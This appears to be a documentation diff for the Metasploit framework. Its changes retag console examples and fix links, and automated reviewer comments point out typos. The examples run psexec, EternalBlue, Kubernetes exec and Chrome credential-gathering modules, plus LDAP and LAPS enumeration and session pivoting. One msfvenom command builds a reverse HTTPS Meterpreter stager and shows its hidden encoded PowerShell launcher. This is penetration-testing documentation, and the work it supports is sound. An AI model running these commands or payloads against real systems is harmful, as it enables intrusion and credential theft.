* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
* `./msfdb reinit` The same as running `./msfdb delete` followed immediately by `./msfdb init`.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb start` Start the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb restart` The same as running `./msfdb stop` followed immediately by `./msfdb start`.
## msfdb errors
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
## What's next?
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [[here|./Metasploit-Web-Service.md]].
If you want to get started hacking but don't know how to, here are a few guides we really like:
* [The easiest metasploit guide you'll ever read](https://www.exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-you%E2%80%99ll-ever-read.pdf) - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation.
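Review bot: the `./msfdb init` bullet being rewritten has two small errors: "Additional prompts displayed after this command is executed allows optional configuration" should be "allow", and "a value of the users choice" needs the possessive "user's". In the "What's next?" paragraph, also touched by this hunk, "for metasploit" should be capitalised and "If that wasn't enough detail for you you can" needs a comma after the first "you".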
@@ -10,7 +10,7 @@ Note that any port can be used to run an application which communicates via HTTP
This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:
```
```msf
msf6 > search tomcat http
```
@@ -48,7 +48,7 @@ run http://example.com HttpTrace=true verbose=true
For instance:
```
```msf
msf6 > use scanner/http/title
msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
@@ -8,7 +8,7 @@ a compromised docker container, or external to the cluster if the required APIs
In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search kubernetes
```
@@ -40,7 +40,7 @@ run session=-1
If the Kubernetes API is publicly accessible and you have a JWT Token:
```
```msf
msf6 > use cloud/kubernetes/enum_kubernetes
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
RHOST => https://kubernetes.docker.internal:6443
@@ -67,7 +67,7 @@ Namespaces
By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:
```
```msf
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
Auxiliary actions:
@@ -114,7 +114,7 @@ The `exploit/multi/kubernetes/exec` module will attempt to create a new pod in t
If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options
will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:
```
```msf
msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
TARGET => Interactive WebSocket
msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
@@ -136,7 +136,7 @@ pwd
If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:
```
```msf
msf6 > use exploit/multi/kubernetes/exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
@@ -1,7 +1,7 @@
## LDAP Workflows
Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc.
For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc.
LDAP on Windows environments are found on:
@@ -36,7 +36,7 @@ run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd a
Example output:
```
```msf
msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
[*] Running module against 192.168.123.13
@@ -56,6 +56,7 @@ CN=Administrator CN=Users DC=domain DC=local
| CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
inistrators,CN=Builtin,DC=domain,DC=local
name Administrator
objectsid S-1-5-21-3402587289-1488798532-3618296993-500
pwdlastset 133189448681297271
samaccountname Administrator
useraccountcontrol 512
@@ -66,8 +67,8 @@ CN=Administrator CN=Users DC=domain DC=local
This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:
- `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
- `ENUM_ADCS_CAS` - Enumerate ADCS certificate authorities.
- `ENUM_ADCS_CERT_TEMPLATES` - Enumerate ADCS certificate templates.
- `ENUM_AD_CS_CAS` - Enumerate AD CS certificate authorities.
- `ENUM_AD_CS_CERT_TEMPLATES` - Enumerate AD CS certificate templates.
- `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
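Review bot: The rename from `ENUM_ADCS_CAS` / `ENUM_ADCS_CERT_TEMPLATES` to `ENUM_AD_CS_CAS` / `ENUM_AD_CS_CERT_TEMPLATES` changes a user-facing action name; anyone with the old spelling in a resource script or notes will get an unknown-action error, so confirm the module's own action list uses the new names in the same change and consider a one-line mention of the rename in the docs.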
@@ -75,6 +76,7 @@ This module has a selection of inbuilt queries which can be configured via the `
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
- `ENUM_DOMAIN` - Dump info about the Active Directory domain.
- `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
- `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
- `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
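Review bot: The new `ENUM_DNS_ZONES` description has "isneeded" run together and a stray " - " after it; suggest "This is needed, as without this BASEDN prefix we often miss certain entries." The `ENUM_CONSTRAINED_DELEGATION` context line just above also reads "contrained" for "constrained".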
@@ -84,6 +86,7 @@ This module has a selection of inbuilt queries which can be configured via the `
- `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
- `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
- `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
- `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
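Review bot: The added `ENUM_MACHINE_ACCOUNT_QUOTA` entry is fine; while here, the `ENUM_UNCONSTRAINED_DELEGATION` context line reads "uncontrained" and should be "unconstrained".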
@@ -100,7 +103,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
Query LDAP for accounts:
```
```msf
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13
@@ -113,7 +116,7 @@ msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.1
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
CN=Administrator CN=Users DC=domain DC=local
==========================================
============================================
Name Attributes
---- ----------
@@ -41,7 +41,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
Connect to a Microsoft SQL Server instance and run a query:
```
```msf
msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
@@ -13,7 +13,7 @@ Metasploit has support for multiple MySQL modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search mysql
```
@@ -6,7 +6,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai
You can search for post gather modules within msfconsole:
```
```msf
msf6 > search type:post platform:windows name:gather
Matching Modules
@@ -25,7 +25,7 @@ There are two ways to launch a Post module, both require an existing session.
Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
```
```msf
msf6 > use post/windows/gather/enum_chrome
msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
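Review bot: The sentence introducing this block reads "the `use` comand"; should be "command". The fence re-tag itself looks right.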
@@ -49,7 +49,7 @@ msf6 post(windows/gather/enum_chrome) >
Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:
```
```msf
msf6 > sessions --interact -1
[*] Starting interaction with 5...
@@ -13,7 +13,7 @@ Metasploit has support for multiple PostgreSQL modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search postgres
```
@@ -97,7 +97,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432
Metasploit's output will be:
```
```msf
msf6 auxiliary(server/capture/postgresql) >
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
@@ -23,7 +23,7 @@ Metasploit has support for multiple SMB modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search mysql
```
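Review bot: The search example under the SMB modules heading still runs `search mysql`; it should be `search smb`, matching the `search ssh` / `search winrm` / `search postgres` examples elsewhere in this change. Worth fixing while re-tagging the fence.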
@@ -192,7 +192,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
Running psexec against a host:
```
```msf
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
@@ -11,7 +11,7 @@ Metasploit has support for multiple SSH modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search ssh
```
@@ -60,7 +60,7 @@ docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest
It should now be possible to test the SSH login from msfconsole:
```
```msf
msf6 > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222
@@ -2,14 +2,14 @@
Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:
```
```msf
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
@@ -35,7 +35,7 @@ Exploit target:
Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:
```
```msf
msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced
Module advanced options (exploit/windows/smb/ms17_010_eternalblue):
@@ -60,14 +60,14 @@ Payload advanced options (windows/x64/meterpreter/reverse_tcp):
You can see which options stilloptions to be set with the `show missing` command:
```
```msf
msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
```
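Review bot: The context line introducing this block reads "which options stilloptions to be set"; should be "which options still need to be set". The `RHOSTS` description update to the docs.metasploit.com URL matches the earlier hunk in this file.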
### Setting options
@@ -102,6 +102,12 @@ use exploit/linux/postgres/postgres_payload
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64' verbose=true
```
You can set complex options using quotes. Example:
```
set COMMAND "date --date='TZ=\"America/Los_Angeles\" 09:00 next Fri' --iso-8601=ns"
```
### URI support for RHOSTS
Metasploit also supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments,
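Review bot: The new "complex options using quotes" example is in an untagged fence while every other console example in this change is re-tagged as ```msf; tag it the same way, and consider prefixing the `set COMMAND ...` line with the `msf6 >` prompt so it reads like the surrounding examples.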
@@ -40,7 +40,7 @@ Metasploit has support for multiple WinRM modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search winrm
```
@@ -69,7 +69,7 @@ run https://192.168.123.139:5986
Example:
```
```msf
msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
[+] 192.168.123.139:5985: Negotiate protocol supported
@@ -122,7 +122,7 @@ run http://user:pass@192.168.123.139:5985
Example:
```
```msf
msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985
[!] No active DB -- Credential data will not be saved!
@@ -145,7 +145,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi
Open a WinRM session:
```
```msf
msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd win::rmauth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
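Review bot: The context line uses `win::rmauth=kerberos`, which does not match the `winrm::rhostname` option on the same line or the `smb::auth`, `ldap::auth` and `mssql::auth` pattern used in the other Kerberos examples in this change; it looks like a typo for `winrm::auth=kerberos` and should be corrected so the example runs as written.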
@@ -60,7 +60,7 @@ When the user views the options for a given module, it will be consolidated. The
Multiple options are available for configuring the module options:
```
```msf
msf5 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
@@ -87,7 +87,7 @@ Exploit target:
Multiple options are consolidated into a single TARGETS field:
```
```msf
msf5 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
@@ -598,4 +598,4 @@ HTTP[S] Options:
**Host True http://10.10.14.31:1234 Hostname/IP for staging.**
BindIP True 0.0.0.0 The IP to bind to on the control server.
**Port True 1234 Port for the listener.**
```
```
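Review bot: The `**Host ...**` and `**Port ...**` lines sit inside a fenced block, so the `**` markers render literally rather than as emphasis; either drop the markers or call out those two options in prose outside the block.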
@@ -71,8 +71,8 @@ The notion of a session configuration block is used to wrap up the following val
* **Socket handle** - When Meterpreter is invoked with TCP communications, an active socket is already in use. This socket handle is intended to be reused by Meterpreter when `metsrv` executes. This socket handle is written to the configuration block on the fly by the loader. It is stored in the Session configuration block so that it has a known location. This value is always a 32-bit DWORD, even on 64-bit platforms.
* **Exit func** - This value is a 32-bit DWORD value that identifies the method that should be used when terminating the Meterpreter session. This value is the equivalent of the [Block API Hash](https://github.com/rapid7/rex-text/blob/0e3b7d3246f9db257465f385f21d6e5385d85212/lib/rex/text/block_api.rb#L16) that represents the function to be invoked. Meterpreter used to delegate the responsibility of handling this to the stager that had invoked it. Meterpreter no longer does this, instead, it handles the closing of the Meterpreter session by itself, and hence the chosen method for termination must be made known in the configuration.
* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [Meterpreter Timeout Control](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [Payload UUID](https://github.com/rapid7/metasploit-framework/wiki/Payload-UUID).
* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [[Meterpreter Timeout Control|./Meterpreter-Timeout-Control.md]].
* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [[Payload UUID|./Payload-UUID.md]].
The layout of this block in memory looks like this:
@@ -7,7 +7,7 @@ There are currently two main ways to debug Meterpreter sessions:
This can be enabled for any Meterpreter session, and does not require a debug Metasploit build:
```
```msf
msf6 > setg SessionTlvLogging true
SessionTlvLogging => true
```
@@ -108,4 +108,4 @@ to_handler
### Java
Functionality not supported
Functionality not supported
@@ -14,12 +14,12 @@ rm -f www.example.com.key www.example.com.crt
### Create a Paranoid Payload
For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [TLS pinning](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-HTTP-Communication#tls-certificate-pinning). For a staged payload, we will use the following command:
For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [[TLS pinning|./Meterpreter-HTTP-Communication.md]]. For a staged payload, we will use the following command:
```
$ ./msfvenom -p windows/meterpreter/reverse_winhttps LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat
$ head launch-paranoid.bat
$ head launch-paranoid.bat
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...
```
@@ -61,7 +61,7 @@ meterpreter > reg enumkey -k HKCU\\Keyboard Layout
The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session.
You can see the type of session you currently have open with the `sessions` command:
```
```msf
msf6 exploit(windows/smb/psexec) > sessions
Active sessions
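Review bot: The context line "interacting with a x86 or x64 Windows session" should read "an x86 or x64".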
@@ -2,9 +2,9 @@ Of the many recent changes to Meterpreter, reliable network communication is one
In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.
Revamped [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control) implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [timeout documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control) for details on those timeout values.
It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.
Behind the scenes, Meterpreter now maintains a circular linked list of transports in memory while running. When a transport fails, Meterpreter will shut down and clean up the current transport mechanism resources, and will move onto the next one in the list. From there, Meterpreter will use this transport configuration to attempt to reconnect to Metasploit. It will continue to make these attempts until one of the following occurs:
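Review bot: The rewritten link line keeps the typo "communcations" from the old line; since the sentence is being touched anyway, fix it to "communications".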
@@ -8,7 +8,7 @@ For these reasons, and more, the new `sleep` command in Meterpreter was created.
## Silent shells
Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [multiple transports](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control), Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.
Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter's new support and control of [[multiple transports|./Meterpreter-Transport-Control.md]], Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn't enough and sometimes users want to be able to shut the session off temporarily.
The `sleep` command is designed to do just that: make the current Meterpreter session go to sleep for a specified period of time, and the wake up again once that time has expired.
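Review bot: The context line "and the wake up again once that time has expired" should read "and then wake up again".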
@@ -74,7 +74,7 @@ Session Expiry : @ 2015-06-09 19:56:05
* tcp://10.1.10.40:6000 300 3600 10
```
The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][].
The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][].
The above output shows that we have one transport enabled that is using `TCP`. We can infer that the transport was a `reverse_tcp` (rather than `bind_tcp`) due to the fact that there is a host IP address in the transport URL. If it was a `bind_tcp`, this would be blank.
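Review bot: `[Meterpreter Timeout Control][]` is a reference-style link, but the only definitions visible for this file (in the later hunk) are `[Timeout documentation]` and `[Reliable Network documentation]`, so this renders as literal bracketed text; point it at `[Timeout documentation][]` or add a matching definition.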
@@ -88,8 +88,8 @@ Session Expiry : @ 2015-06-09 19:56:05
Curr URL Comms T/O Retry Total Retry Wait User Agent Proxy Host Proxy User Proxy Pass Cert Hash
---- --- --------- ----------- ---------- ---------- ---------- ---------- ---------- ---------
* tcp://10.1.10.40:6000 300 3600 10
http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1
* tcp://10.1.10.40:6000 300 3600 10
http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1
```
### Adding transports
@@ -174,7 +174,7 @@ meterpreter > transport next
[+] Successfully changed to the next transport, killing current session.
[*] 10.1.10.35 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
msf exploit(handler) >
[*] 10.1.10.40:46130 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 2 opened (10.1.10.40:5105 -> 10.1.10.40:46130) at 2015-06-02 20:53:54 +1000
@@ -273,7 +273,7 @@ Session Expiry : @ 2015-07-10 07:39:08
---- --- --------- ----------- ----------
* tcp://10.1.10.40:5000 300 3600 10
meterpreter >
meterpreter >
```
### Resilient transports
@@ -350,7 +350,7 @@ The session is back up and running as if nothing had gone wrong.
In the case where Meterpreter is configured with only a single transport mechanism, this process still takes place. Meterpreter's transport list implementation is a cyclic linked-list, and once the end of the list has been reached, it simply starts from the beginning again. This means that if there's a list of one transport then Meterpreter will continually attempt to use that one transport until the session expires. This works for both `TCP` and `HTTP/S`.
For important detail on network resiliency, please see the [reliable network communication documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication).
For important detail on network resiliency, please see the [[reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]]
## Supported Meterpreters
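Review bot: The rewritten sentence drops the trailing period after `documentation]]`; restore it so the line reads "...reliable network communication documentation|./Meterpreter-Reliable-Network-Communication.md]]."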
@@ -363,5 +363,5 @@ The following Meterpreter implementations currently support the transport comman
* Java
* Python
[Timeout documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control
[Reliable Network documentation]: https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication
[Timeout documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html
[Reliable Network documentation]: https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html
@@ -11,7 +11,7 @@ The help page includes:
### How to use it
After you load a module, you can type ```info -d``` to generate a help page that provides basic usage information and displays the PR history for the module.
```
```msf
msf> use auxiliary/scanner/smb/smb_login
msf (smb_login)> info -d
```
@@ -67,4 +67,4 @@ These are just suggestions, but it'd be nice if the KB had these sections:
- **Vulnerable Applications** - Tells users what targets (version numbers) are vulnerable to the module and provides instructions on how to access vulnerable targets for testing. If possible provide a download link and any setup instructions to configure the software appropriately.
- **Verification Steps** - Tells users how to use the module and what the expected results are from running the module.
- **Options** - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required.
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date.
- **Scenarios** - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date.
@@ -44,7 +44,7 @@ $ cat ~/.msf4/payloads.json
```
Once this payload is launched, the output of the ```sessions -l -v``` command will show the UUID, whether or not the UUID is registered, and any locally-assigned name of the UUID:
```
```msf
msf exploit(handler) > run -j
[*] 127.0.0.1:36235 (UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z) Staging Native payload ...
[*] Meterpreter session 1 opened (127.1.1.1:4444 -> 127.0.0.1:36235) at 2015-06-25 17:12:40 -0700
@@ -33,7 +33,7 @@ There a few ways to register this route in Metasploit so that it knows how to re
## AutoRoute
One of the easiest ways to do this is to use the `post/multi/manage/autoroute` module which will help us automatically add in routes for the target to Metasploit's routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Lets look at a sample run of this command:
```
```msf
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
@@ -80,7 +80,7 @@ msf6 post(multi/manage/autoroute) >
```
If we now use Meterpreter's `route` command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.
```
```msf
msf6 post(multi/manage/autoroute) > route
IPv4 Active Routing Table
@@ -97,7 +97,7 @@ msf6 post(multi/manage/autoroute) >
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
```
```msf
msf6 post(multi/manage/autoroute) > route flush
msf6 post(multi/manage/autoroute) > route
[*] There are currently no routes defined.
@@ -108,7 +108,7 @@ Now lets trying doing the same thing manually.
## Route
Here we can use `route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>` to add the routes from within Metasploit, followed by `route print` to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.
```
```msf
msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
[*] Route added
msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
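Review bot: The context line `route add 172.19.176.0 255.255.240 1` has a three-octet netmask; the later `route remove 172.19.176.0/20 1` in this file implies it should be `255.255.240.0`. Also "Now lets trying doing the same thing manually" in the hunk header should read "Now let's try doing".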
@@ -131,7 +131,7 @@ msf6 post(multi/manage/autoroute) >
Finally we can check that the route will use session 1 by using `route get 169.254.204.110`
```
```msf
msf6 post(multi/manage/autoroute) > route get 169.254.204.110
169.254.204.110 routes through: Session 1
msf6 post(multi/manage/autoroute) >
@@ -141,7 +141,7 @@ If we want to then remove a specific route (such as in this case we want to remo
Example:
```
```msf
msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
[*] Route removed
msf6 post(multi/manage/autoroute) > route
@@ -160,7 +160,7 @@ msf6 post(multi/manage/autoroute) >
## Using the Pivot
At this point we can now use the pivot with any Metasploit modules as shown below:
```
```msf
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
@@ -221,7 +221,7 @@ The Windows Meterpreter payload supports lateral movement in a network through S
First open a Windows Meterpreter session to the pivot machine:
```
```msf
